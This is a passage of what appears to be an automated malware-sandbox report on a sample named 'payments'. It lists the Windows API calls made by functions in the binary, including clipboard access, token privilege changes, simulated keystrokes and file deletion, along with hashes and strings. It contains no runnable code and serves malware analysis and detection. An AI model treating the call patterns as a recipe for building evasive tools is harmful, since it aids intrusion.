                                                                                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                          • Instruction ID: f5a8f21ec470f04021b68aea013f8f67abcd901958520191813098f847eb516e
                                                                                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                          • Instruction Fuzzy Hash: A1E0BF7498010DEFDB00EFE4D54969E7BB4EF04301F100161FD0192281D63099508A62
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
                                                                                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00CFF87D
                                                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CFF8DC
                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00CFF919
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CFF940
                                                                                                                          • SendMessageW.USER32 ref: 00CFF966
                                                                                                                          • _wcsncpy.LIBCMT ref: 00CFF9D2
                                                                                                                          • GetKeyState.USER32(00000011), ref: 00CFF9F3
                                                                                                                          • GetKeyState.USER32(00000009), ref: 00CFFA00
                                                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CFFA16
                                                                                                                          • GetKeyState.USER32(00000010), ref: 00CFFA20
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CFFA4F
                                                                                                                          • SendMessageW.USER32 ref: 00CFFA72
                                                                                                                          • SendMessageW.USER32(?,00001030,?,00CFE059), ref: 00CFFB6F
                                                                                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00CFFB85
                                                                                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00CFFB96
                                                                                                                          • SetCapture.USER32(?), ref: 00CFFB9F
                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00CFFC03
                                                                                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00CFFC0F
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00CFFC29
                                                                                                                          • ReleaseCapture.USER32 ref: 00CFFC34
                                                                                                                          • GetCursorPos.USER32(?), ref: 00CFFC69
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00CFFC76
                                                                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CFFCD8
                                                                                                                          • SendMessageW.USER32 ref: 00CFFD02
                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CFFD41
                                                                                                                          • SendMessageW.USER32 ref: 00CFFD6C
                                                                                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00CFFD84
                                                                                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00CFFD8F
                                                                                                                          • GetCursorPos.USER32(?), ref: 00CFFDB0
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00CFFDBD
                                                                                                                          • GetParent.USER32(?), ref: 00CFFDD9
                                                                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CFFE3F
                                                                                                                          • SendMessageW.USER32 ref: 00CFFE6F
                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00CFFEC5
                                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00CFFEF1
                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CFFF19
                                                                                                                          • SendMessageW.USER32 ref: 00CFFF3C
                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00CFFF86
                                                                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00CFFFB6
                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00D0004B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                          • String ID: @GUI_DRAGID$@U=u$F
                                                                                                                          • API String ID: 2516578528-1007936534
                                                                                                                          • Opcode ID: c91a1bd46247b2f665c6a64d8c0d7846bf589c94ea953918691fd7d0c289e560
                                                                                                                          • Instruction ID: 3210dd617536164ebded9c56de7787b92574d2f8053f632b1d8f47a7da6e5ae2
                                                                                                                          • Opcode Fuzzy Hash: c91a1bd46247b2f665c6a64d8c0d7846bf589c94ea953918691fd7d0c289e560
                                                                                                                          • Instruction Fuzzy Hash: FB32AC75604349AFDB10CF64C884BBABBA5FF4A394F14062DFA65872A1C771DD02CB62
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00CFB1CD
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: %d/%02d/%02d$@U=u
                                                                                                                          • API String ID: 3850602802-2764005415
                                                                                                                          • Opcode ID: 4fb8ce3f62117ac096982580a01a7c263e31cf58c8159c6d7a97f3ba880c9c9b
                                                                                                                          • Instruction ID: fa10c3e7f69e5eafa1eabfac0c5ee9da68718e0e683578088afdecd0876ff6ff
                                                                                                                          • Opcode Fuzzy Hash: 4fb8ce3f62117ac096982580a01a7c263e31cf58c8159c6d7a97f3ba880c9c9b
                                                                                                                          • Instruction Fuzzy Hash: 2C12AFB1500319ABEB658F65CC49FBEBBB5FF49710F108119FA19DA2D1DB708942CB22
                                                                                                                          APIs
                                                                                                                          • GetForegroundWindow.USER32(00000000,00000000), ref: 00CAEB4A
                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D03AEA
                                                                                                                          • IsIconic.USER32(000000FF), ref: 00D03AF3
                                                                                                                          • ShowWindow.USER32(000000FF,00000009), ref: 00D03B00
                                                                                                                          • SetForegroundWindow.USER32(000000FF), ref: 00D03B0A
                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D03B20
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00D03B27
                                                                                                                          • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00D03B33
                                                                                                                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00D03B44
                                                                                                                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00D03B4C
                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00D03B54
                                                                                                                          • SetForegroundWindow.USER32(000000FF), ref: 00D03B57
                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D03B6C
                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 00D03B77
                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D03B81
                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 00D03B86
                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D03B8F
                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 00D03B94
                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D03B9E
                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 00D03BA3
                                                                                                                          • SetForegroundWindow.USER32(000000FF), ref: 00D03BA6
                                                                                                                          • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00D03BCD
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                          • API String ID: 4125248594-2988720461
                                                                                                                          • Opcode ID: 4111d1706b98cfb5d3cefc850129f007786df50aa5ec7926323f3d158df44ae3
                                                                                                                          • Instruction ID: 691141526e3546a65485e3cbf4ce2111536adb443f5a0dedfe6c0b823cd90193
                                                                                                                          • Opcode Fuzzy Hash: 4111d1706b98cfb5d3cefc850129f007786df50aa5ec7926323f3d158df44ae3
                                                                                                                          • Instruction Fuzzy Hash: 53319471A403187BFB205BA59C49FBF7E6DEB45B54F108015FA05EA2D1DBB09D01EAB0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CCB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CCB180
                                                                                                                            • Part of subcall function 00CCB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CCB1AD
                                                                                                                            • Part of subcall function 00CCB134: GetLastError.KERNEL32 ref: 00CCB1BA
                                                                                                                          • _memset.LIBCMT ref: 00CCAD08
                                                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00CCAD5A
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00CCAD6B
                                                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00CCAD82
                                                                                                                          • GetProcessWindowStation.USER32 ref: 00CCAD9B
                                                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 00CCADA5
                                                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00CCADBF
                                                                                                                            • Part of subcall function 00CCAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CCACC0), ref: 00CCAB99
                                                                                                                            • Part of subcall function 00CCAB84: CloseHandle.KERNEL32(?,?,00CCACC0), ref: 00CCABAB
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                          • String ID: $default$winsta0
                                                                                                                          • API String ID: 2063423040-1027155976
                                                                                                                          • Opcode ID: 55007e332814fc2749dba21e7b52c6b0be1a92e7065e290927f22dbc67a779bd
                                                                                                                          • Instruction ID: a7b3f0e2640f403c1d92df7b2d10416dad15bd36e0e9996a0fdeb7b497dd6e7f
                                                                                                                          • Opcode Fuzzy Hash: 55007e332814fc2749dba21e7b52c6b0be1a92e7065e290927f22dbc67a779bd
                                                                                                                          • Instruction Fuzzy Hash: 0981367190020DAFDF119FA4DC49EEEBB79EF08308F14811DF925A62A1DB318E55DB62
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CD6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CD5FA6,?), ref: 00CD6ED8
                                                                                                                            • Part of subcall function 00CD6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CD5FA6,?), ref: 00CD6EF1
                                                                                                                            • Part of subcall function 00CD725E: __wsplitpath.LIBCMT ref: 00CD727B
                                                                                                                            • Part of subcall function 00CD725E: __wsplitpath.LIBCMT ref: 00CD728E
                                                                                                                            • Part of subcall function 00CD72CB: GetFileAttributesW.KERNEL32(?,00CD6019), ref: 00CD72CC
                                                                                                                          • _wcscat.LIBCMT ref: 00CD6149
                                                                                                                          • _wcscat.LIBCMT ref: 00CD6167
                                                                                                                          • __wsplitpath.LIBCMT ref: 00CD618E
                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00CD61A4
                                                                                                                          • _wcscpy.LIBCMT ref: 00CD6209
                                                                                                                          • _wcscat.LIBCMT ref: 00CD621C
                                                                                                                          • _wcscat.LIBCMT ref: 00CD622F
                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00CD625D
                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00CD626E
                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00CD6289
                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00CD6298
                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 00CD62AD
                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00CD62BE
                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CD62E1
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00CD62FD
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00CD630B
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                                                          • String ID: \*.*
                                                                                                                          • API String ID: 1917200108-1173974218
                                                                                                                          • Opcode ID: 4fae4f3b549e3891d55e579b851796c8fb1e6efdb7bcf28516475bfaef15a318
                                                                                                                          • Instruction ID: 9027a854caf975a11b4fec94ec4db34cd6f0a4a6890a35e02b21071d9eec7a24
                                                                                                                          • Opcode Fuzzy Hash: 4fae4f3b549e3891d55e579b851796c8fb1e6efdb7bcf28516475bfaef15a318
                                                                                                                          • Instruction Fuzzy Hash: F151117280821C6ACB21EBA5CC45DEF77BCAF05300F0541E6E695E2241EF769789DFA4
APIs
• OpenClipboard.USER32(00D2DC00), ref: 00CE6B36
• IsClipboardFormatAvailable.USER32(0000000D), ref: 00CE6B44
• GetClipboardData.USER32(0000000D), ref: 00CE6B4C
• CloseClipboard.USER32 ref: 00CE6B58
• GlobalLock.KERNEL32(00000000), ref: 00CE6B74
• CloseClipboard.USER32 ref: 00CE6B7E
• GlobalUnlock.KERNEL32(00000000), ref: 00CE6B93
• IsClipboardFormatAvailable.USER32(00000001), ref: 00CE6BA0
• GetClipboardData.USER32(00000001), ref: 00CE6BA8
• GlobalLock.KERNEL32(00000000), ref: 00CE6BB5
• GlobalUnlock.KERNEL32(00000000), ref: 00CE6BE9
• CloseClipboard.USER32 ref: 00CE6CF6
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
• String ID:
• API String ID: 3222323430-0
• Opcode ID: ce2fc181e8dda4a41365dcb40b506aba0421c779e1b1b9d9fff00d2aba7a25bc
• Instruction ID: 8939aaa16857b8a4c3d508ba2ad4930c5ef49908f8a61e5844b473eff0d73ca6
• Opcode Fuzzy Hash: ce2fc181e8dda4a41365dcb40b506aba0421c779e1b1b9d9fff00d2aba7a25bc
• Instruction Fuzzy Hash: 5351B231204345ABD700AF61DC8AFAE77A9AF94B50F104129F566D22D1DF70D906DB72
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00CDF62B
• FindClose.KERNEL32(00000000), ref: 00CDF67F
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CDF6A4
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CDF6BB
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00CDF6E2
• __swprintf.LIBCMT ref: 00CDF72E
• __swprintf.LIBCMT ref: 00CDF767
• __swprintf.LIBCMT ref: 00CDF7BB
  • Part of subcall function 00CB172B: __woutput_l.LIBCMT ref: 00CB1784
• __swprintf.LIBCMT ref: 00CDF809
• __swprintf.LIBCMT ref: 00CDF858
• __swprintf.LIBCMT ref: 00CDF8A7
• __swprintf.LIBCMT ref: 00CDF8F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
• String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
• API String ID: 835046349-2428617273
• Opcode ID: 047d1a9909d3bc8b46654fb8c75caf783cba87623b6466cf5be7bcad9e1f69d6
• Instruction ID: 063430764883a8a365bec22795713f81d64a6ed52c453fd302279ae64b74198d
• Opcode Fuzzy Hash: 047d1a9909d3bc8b46654fb8c75caf783cba87623b6466cf5be7bcad9e1f69d6
• Instruction Fuzzy Hash: C6A132B2408344ABC710EBA4C895DAFB7ECBF99704F44482EF595C3151EB34DA49D762
APIs
• FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00CE1B50
• _wcscmp.LIBCMT ref: 00CE1B65
• _wcscmp.LIBCMT ref: 00CE1B7C
• GetFileAttributesW.KERNEL32(?), ref: 00CE1B8E
• SetFileAttributesW.KERNEL32(?,?), ref: 00CE1BA8
• FindNextFileW.KERNEL32(00000000,?), ref: 00CE1BC0
• FindClose.KERNEL32(00000000), ref: 00CE1BCB
• FindFirstFileW.KERNEL32(*.*,?), ref: 00CE1BE7
• _wcscmp.LIBCMT ref: 00CE1C0E
• _wcscmp.LIBCMT ref: 00CE1C25
• SetCurrentDirectoryW.KERNEL32(?), ref: 00CE1C37
• SetCurrentDirectoryW.KERNEL32(00D439FC), ref: 00CE1C55
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE1C5F
• FindClose.KERNEL32(00000000), ref: 00CE1C6C
• FindClose.KERNEL32(00000000), ref: 00CE1C7C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1803514871-438819550
• Opcode ID: 99d27a8fb7f9fa168fdbbbafae3a9f1da500afd1af4e382dd8644174106cd375
• Instruction ID: a19775f54d16a5eac2c779d6b789b5d861187b7d5a0d712e6659d7532b7e7d5e
• Opcode Fuzzy Hash: 99d27a8fb7f9fa168fdbbbafae3a9f1da500afd1af4e382dd8644174106cd375
• Instruction Fuzzy Hash: 4B31D1725403597FCF20AFB5EC49ADE77ADAF05320F284195EC21E2190EB70DB998A74
APIs
• FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00CE1CAB
• _wcscmp.LIBCMT ref: 00CE1CC0
• _wcscmp.LIBCMT ref: 00CE1CD7
  • Part of subcall function 00CD6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00CD6BEF
• FindNextFileW.KERNEL32(00000000,?), ref: 00CE1D06
• FindClose.KERNEL32(00000000), ref: 00CE1D11
• FindFirstFileW.KERNEL32(*.*,?), ref: 00CE1D2D
• _wcscmp.LIBCMT ref: 00CE1D54
• _wcscmp.LIBCMT ref: 00CE1D6B
• SetCurrentDirectoryW.KERNEL32(?), ref: 00CE1D7D
• SetCurrentDirectoryW.KERNEL32(00D439FC), ref: 00CE1D9B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE1DA5
• FindClose.KERNEL32(00000000), ref: 00CE1DB2
• FindClose.KERNEL32(00000000), ref: 00CE1DC2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 1824444939-438819550
• Opcode ID: 6797efeb8149c3e45df0ced1f6f63af3fdeb7a34894254513f89c5977b035a7e
• Instruction ID: 985cb054c7936173ab4f5e71318a848aa07dcb259674504032d519029f94eacc
• Opcode Fuzzy Hash: 6797efeb8149c3e45df0ced1f6f63af3fdeb7a34894254513f89c5977b035a7e
• Instruction Fuzzy Hash: F531F03250065A7FCF22AFA5EC09ADE37AD9F05324F284551EC21E2190DB70DB998E64
APIs
• GetLocalTime.KERNEL32(?), ref: 00CE09DF
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00CE09EF
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CE09FB
• __wsplitpath.LIBCMT ref: 00CE0A59
• _wcscat.LIBCMT ref: 00CE0A71
• _wcscat.LIBCMT ref: 00CE0A83
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CE0A98
• SetCurrentDirectoryW.KERNEL32(?), ref: 00CE0AAC
• SetCurrentDirectoryW.KERNEL32(?), ref: 00CE0ADE
• SetCurrentDirectoryW.KERNEL32(?), ref: 00CE0AFF
• _wcscpy.LIBCMT ref: 00CE0B0B
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00CE0B4A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
• String ID: *.*
• API String ID: 3566783562-438819550
• Opcode ID: 2ffc65ae4e524d58c7bfe14e5e95745233654bfa132f34f68114b5c31131deb7
• Instruction ID: 873efbb5f41eb829d099b8b160586fe5913b50df7459408f0478e5d558af9b01
• Opcode Fuzzy Hash: 2ffc65ae4e524d58c7bfe14e5e95745233654bfa132f34f68114b5c31131deb7
• Instruction Fuzzy Hash: 8B61AE721043459FCB10EF61C84599EB3E8FF89314F14892EF999C7252EB35EA45CB92
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CCABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00CCABD7
                                                                                                                            • Part of subcall function 00CCABBB: GetLastError.KERNEL32(?,00CCA69F,?,?,?), ref: 00CCABE1
                                                                                                                            • Part of subcall function 00CCABBB: GetProcessHeap.KERNEL32(00000008,?,?,00CCA69F,?,?,?), ref: 00CCABF0
                                                                                                                            • Part of subcall function 00CCABBB: HeapAlloc.KERNEL32(00000000,?,00CCA69F,?,?,?), ref: 00CCABF7
                                                                                                                            • Part of subcall function 00CCABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00CCAC0E
                                                                                                                            • Part of subcall function 00CCAC56: GetProcessHeap.KERNEL32(00000008,00CCA6B5,00000000,00000000,?,00CCA6B5,?), ref: 00CCAC62
                                                                                                                            • Part of subcall function 00CCAC56: HeapAlloc.KERNEL32(00000000,?,00CCA6B5,?), ref: 00CCAC69
                                                                                                                            • Part of subcall function 00CCAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00CCA6B5,?), ref: 00CCAC7A
                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CCA6D0
                                                                                                                          • _memset.LIBCMT ref: 00CCA6E5
                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CCA704
                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00CCA715
                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00CCA752
                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CCA76E
                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00CCA78B
                                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00CCA79A
                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00CCA7A1
                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CCA7C2
                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00CCA7C9
                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CCA7FA
                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CCA820
                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CCA834
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3996160137-0
                                                                                                                          • Opcode ID: ce68b6009707b93f628cf80eb065d68439a3ed0bae580fcf5cc237111d3430f1
                                                                                                                          • Instruction ID: 6987d4941650fa8978ade7f8d454c8f02ab642b7e1c6ad0c245b638952c3d087
                                                                                                                          • Opcode Fuzzy Hash: ce68b6009707b93f628cf80eb065d68439a3ed0bae580fcf5cc237111d3430f1
                                                                                                                          • Instruction Fuzzy Hash: 75513971900209BFDF10DFA5DC58EEEBBB9FF08304F148129E925E6290DB359A06DB61
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                          • API String ID: 0-4052911093
                                                                                                                          • Opcode ID: 24ab914b706708e4e325b5c37022f589e3148ad46af62c16b44970fc99b37ac8
